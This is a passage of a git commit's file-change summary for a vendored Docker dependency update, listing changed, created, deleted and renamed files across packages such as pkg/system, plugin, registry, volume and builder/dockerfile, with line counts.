.../docker/docker/pkg/pubsub/publisher.go | 12 +- .../docker/pkg/pubsub/publisher_test.go | 10 +- .../docker/docker/pkg/random/random.go | 71 - .../docker/docker/pkg/random/random_test.go | 22 - .../docker/docker/pkg/reexec/README.md | 2 +- .../docker/docker/pkg/reexec/command_linux.go | 8 +- .../docker/docker/pkg/reexec/command_unix.go | 4 +- .../docker/pkg/reexec/command_unsupported.go | 6 +- .../docker/pkg/reexec/command_windows.go | 4 +- .../docker/docker/pkg/reexec/reexec.go | 2 +- .../docker/docker/pkg/reexec/reexec_test.go | 52 + .../docker/docker/pkg/registrar/registrar.go | 127 - .../docker/pkg/registrar/registrar_test.go | 119 - .../docker/docker/pkg/signal/signal.go | 4 +- .../docker/docker/pkg/signal/signal_darwin.go | 2 +- .../docker/pkg/signal/signal_freebsd.go | 2 +- .../docker/docker/pkg/signal/signal_linux.go | 73 +- .../docker/pkg/signal/signal_linux_test.go | 59 + .../docker/pkg/signal/signal_solaris.go | 42 - .../docker/docker/pkg/signal/signal_test.go | 34 + .../docker/docker/pkg/signal/signal_unix.go | 2 +- .../docker/pkg/signal/signal_unsupported.go | 4 +- .../docker/pkg/signal/signal_windows.go | 4 +- .../docker/pkg/signal/testfiles/main.go | 43 + .../docker/docker/pkg/signal/trap.go | 13 +- .../docker/pkg/signal/trap_linux_test.go | 82 + .../docker/docker/pkg/stdcopy/stdcopy.go | 20 +- .../docker/docker/pkg/stdcopy/stdcopy_test.go | 35 +- .../pkg/streamformatter/streamformatter.go | 189 +- .../streamformatter/streamformatter_test.go | 152 +- .../pkg/streamformatter/streamwriter.go | 47 + .../pkg/streamformatter/streamwriter_test.go | 35 + .../docker/docker/pkg/stringid/stringid.go | 54 +- .../docker/pkg/stringid/stringid_test.go | 2 +- .../docker/docker/pkg/stringutils/README.md | 1 - .../docker/pkg/stringutils/stringutils.go | 101 - .../pkg/stringutils/stringutils_test.go | 121 - .../docker/docker/pkg/symlink/LICENSE.APACHE | 2 +- .../docker/docker/pkg/symlink/LICENSE.BSD | 2 +- .../docker/docker/pkg/symlink/fs.go | 4 +- .../docker/docker/pkg/symlink/fs_unix.go | 2 +- .../docker/docker/pkg/symlink/fs_unix_test.go | 2 +- .../docker/docker/pkg/symlink/fs_windows.go | 22 +- .../docker/docker/pkg/sysinfo/numcpu.go | 2 +- .../docker/docker/pkg/sysinfo/numcpu_linux.go | 11 +- .../docker/pkg/sysinfo/numcpu_windows.go | 4 +- .../docker/docker/pkg/sysinfo/sysinfo.go | 2 +- .../docker/pkg/sysinfo/sysinfo_linux.go | 15 +- .../docker/pkg/sysinfo/sysinfo_linux_test.go | 76 +- .../docker/pkg/sysinfo/sysinfo_solaris.go | 121 - .../docker/docker/pkg/sysinfo/sysinfo_test.go | 2 +- .../docker/docker/pkg/sysinfo/sysinfo_unix.go | 6 +- .../docker/pkg/sysinfo/sysinfo_windows.go | 4 +- .../docker/docker/pkg/system/chtimes.go | 25 +- .../docker/docker/pkg/system/chtimes_test.go | 2 +- .../docker/docker/pkg/system/chtimes_unix.go | 2 +- .../docker/pkg/system/chtimes_unix_test.go | 2 +- .../docker/pkg/system/chtimes_windows.go | 23 +- .../docker/pkg/system/chtimes_windows_test.go | 2 +- .../docker/docker/pkg/system/errors.go | 5 +- .../docker/pkg/system/events_windows.go | 85 - .../docker/docker/pkg/system/exitcode.go | 16 +- .../docker/docker/pkg/system/filesys.go | 27 +- .../docker/pkg/system/filesys_windows.go | 172 +- .../docker/docker/pkg/system/init.go | 22 + .../docker/docker/pkg/system/init_unix.go | 7 + .../docker/docker/pkg/system/init_windows.go | 12 + .../docker/docker/pkg/system/lcow.go | 69 + .../docker/docker/pkg/system/lcow_unix.go | 8 + .../docker/docker/pkg/system/lcow_windows.go | 6 + .../pkg/system/{lstat.go => lstat_unix.go} | 2 +- .../docker/pkg/system/lstat_unix_test.go | 2 +- .../docker/docker/pkg/system/lstat_windows.go | 17 +- .../docker/docker/pkg/system/meminfo.go | 2 +- .../docker/docker/pkg/system/meminfo_linux.go | 2 +- .../docker/pkg/system/meminfo_solaris.go | 128 - .../docker/pkg/system/meminfo_unix_test.go | 2 +- .../docker/pkg/system/meminfo_unsupported.go | 4 +- .../docker/pkg/system/meminfo_windows.go | 2 +- .../docker/docker/pkg/system/mknod.go | 8 +- .../docker/docker/pkg/system/mknod_windows.go | 4 +- .../docker/docker/pkg/system/path.go | 60 + .../docker/docker/pkg/system/path_unix.go | 14 - .../docker/docker/pkg/system/path_windows.go | 37 - .../docker/pkg/system/path_windows_test.go | 27 +- .../{utils => pkg/system}/process_unix.go | 12 +- .../docker/pkg/system/process_windows.go | 18 + .../github.com/docker/docker/pkg/system/rm.go | 80 + .../docker/docker/pkg/system/rm_test.go | 84 + .../docker/docker/pkg/system/stat_darwin.go | 25 +- .../docker/docker/pkg/system/stat_freebsd.go | 18 +- .../docker/docker/pkg/system/stat_linux.go | 22 +- .../docker/docker/pkg/system/stat_openbsd.go | 8 +- .../docker/docker/pkg/system/stat_solaris.go | 27 +- .../pkg/system/{stat.go => stat_unix.go} | 20 +- .../docker/pkg/system/stat_unix_test.go | 9 +- .../docker/pkg/system/stat_unsupported.go | 17 - .../docker/docker/pkg/system/stat_windows.go | 48 +- .../docker/docker/pkg/system/syscall_unix.go | 6 +- .../docker/pkg/system/syscall_windows.go | 42 +- .../docker/pkg/system/syscall_windows_test.go | 2 +- .../docker/docker/pkg/system/umask.go | 6 +- .../docker/docker/pkg/system/umask_windows.go | 4 +- .../docker/pkg/system/utimes_freebsd.go | 10 +- .../docker/docker/pkg/system/utimes_linux.go | 15 +- .../docker/pkg/system/utimes_unix_test.go | 2 +- .../docker/pkg/system/utimes_unsupported.go | 2 +- .../docker/docker/pkg/system/xattrs_linux.go | 50 +- .../docker/pkg/system/xattrs_unsupported.go | 2 +- .../docker/docker/pkg/tailfile/tailfile.go | 4 +- .../docker/pkg/tailfile/tailfile_test.go | 2 +- .../docker/pkg/tarsum/builder_context.go | 2 +- .../docker/pkg/tarsum/builder_context_test.go | 2 +- .../docker/docker/pkg/tarsum/fileinfosums.go | 13 +- .../docker/pkg/tarsum/fileinfosums_test.go | 6 +- .../docker/docker/pkg/tarsum/tarsum.go | 26 +- .../docker/docker/pkg/tarsum/tarsum_test.go | 45 +- .../docker/docker/pkg/tarsum/versioning.go | 10 +- .../docker/pkg/tarsum/versioning_test.go | 2 +- .../docker/docker/pkg/tarsum/writercloser.go | 2 +- .../docker/docker/pkg/term/ascii.go | 4 +- .../docker/docker/pkg/term/ascii_test.go | 48 +- .../docker/docker/pkg/term/proxy.go | 78 + .../docker/docker/pkg/term/proxy_test.go | 115 + .../github.com/docker/docker/pkg/term/tc.go | 20 + .../docker/docker/pkg/term/tc_linux_cgo.go | 50 - .../docker/docker/pkg/term/tc_other.go | 20 - .../docker/docker/pkg/term/tc_solaris_cgo.go | 63 - .../github.com/docker/docker/pkg/term/term.go | 9 +- .../docker/docker/pkg/term/term_linux_test.go | 117 + .../docker/docker/pkg/term/term_solaris.go | 41 - .../docker/docker/pkg/term/term_unix.go | 29 - .../docker/docker/pkg/term/term_windows.go | 53 +- .../docker/docker/pkg/term/termios_bsd.go | 42 + .../docker/docker/pkg/term/termios_darwin.go | 69 - .../docker/docker/pkg/term/termios_freebsd.go | 69 - .../docker/docker/pkg/term/termios_linux.go | 42 +- .../docker/docker/pkg/term/termios_openbsd.go | 69 - .../docker/pkg/term/windows/ansi_reader.go | 2 +- .../docker/pkg/term/windows/ansi_writer.go | 2 +- .../docker/docker/pkg/term/windows/console.go | 2 +- .../docker/docker/pkg/term/windows/windows.go | 6 +- .../docker/pkg/term/windows/windows_test.go | 2 +- .../docker/docker/pkg/term/winsize.go | 20 + .../docker/pkg/testutil/assert/assert.go | 97 - .../docker/docker/pkg/testutil/pkg.go | 1 - .../docker/pkg/testutil/tempfile/tempfile.go | 36 - .../docker/pkg/tlsconfig/tlsconfig_clone.go | 11 - .../pkg/tlsconfig/tlsconfig_clone_go16.go | 31 - .../pkg/tlsconfig/tlsconfig_clone_go17.go | 33 - .../docker/pkg/truncindex/truncindex.go | 14 +- .../docker/pkg/truncindex/truncindex_test.go | 28 +- .../docker/docker/pkg/urlutil/urlutil.go | 18 +- .../docker/docker/pkg/urlutil/urlutil_test.go | 24 +- .../docker/docker/pkg/useragent/useragent.go | 2 +- .../docker/pkg/useragent/useragent_test.go | 2 +- .../docker/docker/plugin/backend_linux.go | 250 +- .../docker/plugin/backend_linux_test.go | 81 + .../docker/plugin/backend_unsupported.go | 11 +- .../docker/docker/plugin/blobstore.go | 27 +- .../github.com/docker/docker/plugin/defs.go | 30 +- .../github.com/docker/docker/plugin/errors.go | 66 + .../github.com/docker/docker/plugin/events.go | 111 + .../plugin/executor/containerd/containerd.go | 175 + .../executor/containerd/containerd_test.go | 148 + .../docker/docker/plugin/manager.go | 229 +- .../docker/docker/plugin/manager_linux.go | 149 +- .../docker/plugin/manager_linux_test.go | 279 + .../docker/docker/plugin/manager_solaris.go | 28 - .../docker/docker/plugin/manager_test.go | 55 + .../docker/docker/plugin/manager_windows.go | 6 +- .../github.com/docker/docker/plugin/store.go | 132 +- .../docker/docker/plugin/store_test.go | 41 +- .../docker/docker/plugin/v2/plugin.go | 97 +- .../docker/docker/plugin/v2/plugin_linux.go | 50 +- .../docker/plugin/v2/plugin_unsupported.go | 4 +- .../docker/docker/plugin/v2/settable.go | 2 +- .../docker/docker/plugin/v2/settable_test.go | 4 +- vendor/github.com/docker/docker/poule.yml | 55 +- .../docker/profiles/apparmor/apparmor.go | 18 +- .../docker/profiles/apparmor/template.go | 4 +- .../docker/profiles/seccomp/default.json | 57 +- .../docker/docker/profiles/seccomp/seccomp.go | 46 +- .../profiles/seccomp/seccomp_default.go | 50 +- .../docker/profiles/seccomp/seccomp_test.go | 2 +- .../profiles/seccomp/seccomp_unsupported.go | 5 +- .../github.com/docker/docker/project/ARM.md | 6 +- .../{CONTRIBUTORS.md => CONTRIBUTING.md} | 0 .../docker/docker/project/GOVERNANCE.md | 127 +- .../docker/docker/project/ISSUE-TRIAGE.md | 6 +- .../project/PACKAGE-REPO-MAINTENANCE.md | 2 +- .../docker/docker/project/PACKAGERS.md | 2 +- .../docker/docker/project/README.md | 2 +- .../docker/project/RELEASE-CHECKLIST.md | 518 -- .../docker/docker/project/RELEASE-PROCESS.md | 2 +- .../docker/docker/project/REVIEWING.md | 2 +- .../github.com/docker/docker/project/TOOLS.md | 2 +- .../docker/docker/reference/errors.go | 25 + .../docker/docker/reference/reference.go | 216 - .../docker/docker/reference/reference_test.go | 275 - .../docker/docker/reference/store.go | 165 +- .../docker/docker/reference/store_test.go | 72 +- .../github.com/docker/docker/registry/auth.go | 67 +- .../docker/docker/registry/auth_test.go | 6 +- .../docker/docker/registry/config.go | 235 +- .../docker/docker/registry/config_test.go | 338 +- .../docker/docker/registry/config_unix.go | 11 +- .../docker/docker/registry/config_windows.go | 9 +- .../docker/docker/registry/endpoint_test.go | 2 +- .../docker/docker/registry/endpoint_v1.go | 16 +- .../docker/docker/registry/errors.go | 31 + .../docker/docker/registry/registry.go | 10 +- .../docker/registry/registry_mock_test.go | 12 +- .../docker/docker/registry/registry_test.go | 119 +- .../resumable}/resumablerequestreader.go | 31 +- .../resumable}/resumablerequestreader_test.go | 142 +- .../docker/docker/registry/service.go | 70 +- .../docker/docker/registry/service_v1.go | 2 +- .../docker/docker/registry/service_v1_test.go | 15 +- .../docker/docker/registry/service_v2.go | 16 +- .../docker/docker/registry/session.go | 88 +- .../docker/docker/registry/types.go | 11 +- .../docker/docker/reports/2017-05-01.md | 35 + .../docker/docker/reports/2017-05-08.md | 34 + .../docker/docker/reports/2017-05-15.md | 52 + .../docker/docker/reports/2017-06-05.md | 36 + .../docker/docker/reports/2017-06-12.md | 78 + .../docker/docker/reports/2017-06-26.md | 120 + .../docker/reports/builder/2017-05-01.md | 47 + .../docker/reports/builder/2017-05-08.md | 57 + .../docker/reports/builder/2017-05-15.md | 64 + .../docker/reports/builder/2017-05-22.md | 47 + .../docker/reports/builder/2017-05-29.md | 52 + .../docker/reports/builder/2017-06-05.md | 58 + .../docker/reports/builder/2017-06-12.md | 58 + .../docker/reports/builder/2017-06-26.md | 78 + .../docker/reports/builder/2017-07-10.md | 65 + .../docker/reports/builder/2017-07-17.md | 79 + .../docker/restartmanager/restartmanager.go | 15 +- .../restartmanager/restartmanager_test.go | 16 +- .../docker/docker/runconfig/config.go | 50 +- .../docker/docker/runconfig/config_test.go | 75 +- .../docker/docker/runconfig/config_unix.go | 4 +- .../docker/docker/runconfig/config_windows.go | 2 +- .../docker/docker/runconfig/errors.go | 50 +- .../docker/docker/runconfig/hostconfig.go | 52 +- .../docker/runconfig/hostconfig_solaris.go | 41 - .../docker/runconfig/hostconfig_test.go | 84 +- .../docker/runconfig/hostconfig_unix.go | 79 +- .../docker/runconfig/hostconfig_windows.go | 62 +- .../runconfig/hostconfig_windows_test.go | 17 + .../docker/docker/runconfig/opts/envfile.go | 81 - .../docker/runconfig/opts/envfile_test.go | 142 - .../docker/runconfig/opts/fixtures/utf16.env | Bin 54 -> 0 bytes .../runconfig/opts/fixtures/utf16be.env | Bin 54 -> 0 bytes .../docker/runconfig/opts/fixtures/utf8.env | 3 - .../docker/runconfig/opts/fixtures/valid.env | 1 - .../runconfig/opts/fixtures/valid.label | 1 - .../docker/docker/runconfig/opts/opts.go | 83 - .../docker/docker/runconfig/opts/opts_test.go | 113 - .../docker/docker/runconfig/opts/parse.go | 977 +-- .../docker/runconfig/opts/parse_test.go | 894 --- .../docker/runconfig/opts/throttledevice.go | 111 - .../docker/runconfig/opts/weightdevice.go | 89 - .../github.com/docker/docker/utils/debug.go | 26 - .../docker/docker/utils/process_windows.go | 20 - .../docker/utils/templates/templates.go | 42 - .../docker/utils/templates/templates_test.go | 38 - .../github.com/docker/docker/utils/utils.go | 87 - vendor/github.com/docker/docker/vendor.conf | 164 +- .../docker/docker/volume/drivers/adapter.go | 73 +- .../docker/docker/volume/drivers/extpoint.go | 218 +- .../docker/volume/drivers/extpoint_test.go | 9 +- .../docker/docker/volume/drivers/proxy.go | 33 +- .../docker/volume/drivers/proxy_test.go | 2 +- .../docker/docker/volume/local/local.go | 116 +- .../docker/docker/volume/local/local_test.go | 73 +- .../docker/docker/volume/local/local_unix.go | 16 +- .../docker/volume/local/local_windows.go | 14 +- .../docker/volume/mounts/lcow_parser.go | 34 + .../docker/volume/mounts/linux_parser.go | 417 ++ .../docker/docker/volume/mounts/mounts.go | 170 + .../docker/docker/volume/mounts/parser.go | 47 + .../docker/volume/mounts/parser_test.go | 480 ++ .../docker/docker/volume/mounts/validate.go | 28 + .../docker/volume/mounts/validate_test.go | 73 + .../validate_unix_test.go} | 2 +- .../validate_windows_test.go} | 2 +- .../docker/volume/{ => mounts}/volume_copy.go | 6 +- .../docker/volume/mounts/volume_unix.go | 18 + .../docker/volume/mounts/volume_windows.go | 8 + .../docker/volume/mounts/windows_parser.go | 456 ++ .../docker/docker/volume/service/by.go | 89 + .../docker/docker/volume/service/convert.go | 132 + .../docker/volume/{store => service}/db.go | 15 +- .../docker/docker/volume/service/db_test.go | 52 + .../docker/volume/service/default_driver.go | 21 + .../volume/service/default_driver_stubs.go | 10 + .../volume/{store => service}/errors.go | 59 +- .../docker/docker/volume/service/opts/opts.go | 89 + .../volume/{store => service}/restore.go | 14 +- .../docker/volume/service/restore_test.go | 58 + .../docker/docker/volume/service/service.go | 243 + .../volume/service/service_linux_test.go | 66 + .../docker/volume/service/service_test.go | 253 + .../docker/volume/{store => service}/store.go | 581 +- .../docker/volume/service/store_test.go | 421 ++ .../docker/volume/service/store_unix.go | 9 + .../{store => service}/store_windows.go | 6 +- .../docker/docker/volume/store/store_test.go | 234 - .../docker/docker/volume/store/store_unix.go | 9 - .../docker/volume/testutils/testutils.go | 119 +- .../docker/docker/volume/validate.go | 125 - .../docker/docker/volume/validate_test.go | 43 - .../github.com/docker/docker/volume/volume.go | 264 +- .../docker/docker/volume/volume_copy_unix.go | 8 - .../docker/volume/volume_copy_windows.go | 6 - .../docker/docker/volume/volume_linux.go | 56 - .../docker/docker/volume/volume_linux_test.go | 51 - .../docker/volume/volume_propagation_linux.go | 47 - .../volume/volume_propagation_linux_test.go | 65 - .../volume/volume_propagation_unsupported.go | 24 - .../docker/docker/volume/volume_test.go | 269 - .../docker/docker/volume/volume_unix.go | 138 - .../docker/volume/volume_unsupported.go | 16 - .../docker/docker/volume/volume_windows.go | 201 - 2656 files changed, 107914 insertions(+), 137977 deletions(-) create mode 100644 vendor/github.com/docker/docker/.DEREK.yml create mode 100644 vendor/github.com/docker/docker/.github/CODEOWNERS delete mode 100644 vendor/github.com/docker/docker/Dockerfile.aarch64 delete mode 100644 vendor/github.com/docker/docker/Dockerfile.armhf create mode 100644 vendor/github.com/docker/docker/Dockerfile.e2e delete mode 100644 vendor/github.com/docker/docker/Dockerfile.ppc64le delete mode 100644 vendor/github.com/docker/docker/Dockerfile.s390x delete mode 100644 vendor/github.com/docker/docker/Dockerfile.solaris create mode 100644 vendor/github.com/docker/docker/TESTING.md delete mode 100644 vendor/github.com/docker/docker/VERSION delete mode 100644 vendor/github.com/docker/docker/api/common_test.go delete mode 100644 vendor/github.com/docker/docker/api/errors/errors.go create mode 100644 vendor/github.com/docker/docker/api/server/backend/build/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/backend/build/tag.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_test.go delete mode 100644 vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go create mode 100644 vendor/github.com/docker/docker/api/server/httputils/write_log_stream.go create mode 100644 vendor/github.com/docker/docker/api/server/middleware/debug_test.go delete mode 100644 vendor/github.com/docker/docker/api/server/profiler.go create mode 100644 vendor/github.com/docker/docker/api/server/router/debug/debug.go create mode 100644 vendor/github.com/docker/docker/api/server/router/debug/debug_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/distribution.go create mode 100644 vendor/github.com/docker/docker/api/server/router/distribution/distribution_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/network/filter_test.go create mode 100644 vendor/github.com/docker/docker/api/server/router/session/backend.go create mode 100644 vendor/github.com/docker/docker/api/server/router/session/session.go create mode 100644 vendor/github.com/docker/docker/api/server/router/session/session_routes.go create mode 100644 vendor/github.com/docker/docker/api/server/router/swarm/helpers.go create mode 100644 vendor/github.com/docker/docker/api/types/backend/build.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_changes.go create mode 100644 vendor/github.com/docker/docker/api/types/container/container_top.go create mode 100644 vendor/github.com/docker/docker/api/types/container/waitcondition.go create mode 100644 vendor/github.com/docker/docker/api/types/filters/example_test.go create mode 100644 vendor/github.com/docker/docker/api/types/graph_driver_data.go create mode 100644 vendor/github.com/docker/docker/api/types/image/image_history.go create mode 100644 vendor/github.com/docker/docker/api/types/image_delete_response_item.go create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.pb.go create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/entry.proto create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/gen.go create mode 100644 vendor/github.com/docker/docker/api/types/plugins/logdriver/io.go delete mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference.go delete mode 100644 vendor/github.com/docker/docker/api/types/reference/image_reference_test.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/config.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/gen.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.pb.go create mode 100644 vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.proto rename vendor/github.com/docker/docker/api/types/volume/{volumes_create.go => volume_create.go} (84%) rename vendor/github.com/docker/docker/api/types/volume/{volumes_list.go => volume_list.go} (78%) create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/containerimage/pull.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/layer.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/adapters/snapshot/snapshot.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/builder.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/controller.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/executor_unix.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/executor_windows.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/exporter/export.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/exporter/writer.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/reqbodyhandler.go create mode 100644 vendor/github.com/docker/docker/builder/builder-next/worker/worker.go delete mode 100644 vendor/github.com/docker/docker/builder/context.go delete mode 100644 vendor/github.com/docker/docker/builder/context_test.go delete mode 100644 vendor/github.com/docker/docker/builder/context_unix.go delete mode 100644 vendor/github.com/docker/docker/builder/context_windows.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/bflag_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/buildargs.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/buildargs_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/clientsession.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/command/command.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/containerbackend.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_test.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/copy_windows.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/envVarTest delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/internals_unix.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/metrics.go create mode 100644 vendor/github.com/docker/docker/builder/dockerfile/mockbackend_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/dumper/main.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/json_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/line_parsers.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/parser_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfile-line/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/env_no_value/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles-negative/shykes-nested-json/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/ADD-COPY-with-JSON/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-consuldock/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/brimstone-docker-consul/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/continueIndent/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/cpuguy83-nagios/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/docker/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/env/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-after-comment/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape-nonewline/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escape/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/escapes/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/support_test.go delete mode 100644 vendor/github.com/docker/docker/builder/dockerfile/wordsTest delete mode 100644 vendor/github.com/docker/docker/builder/dockerignore.go create mode 100644 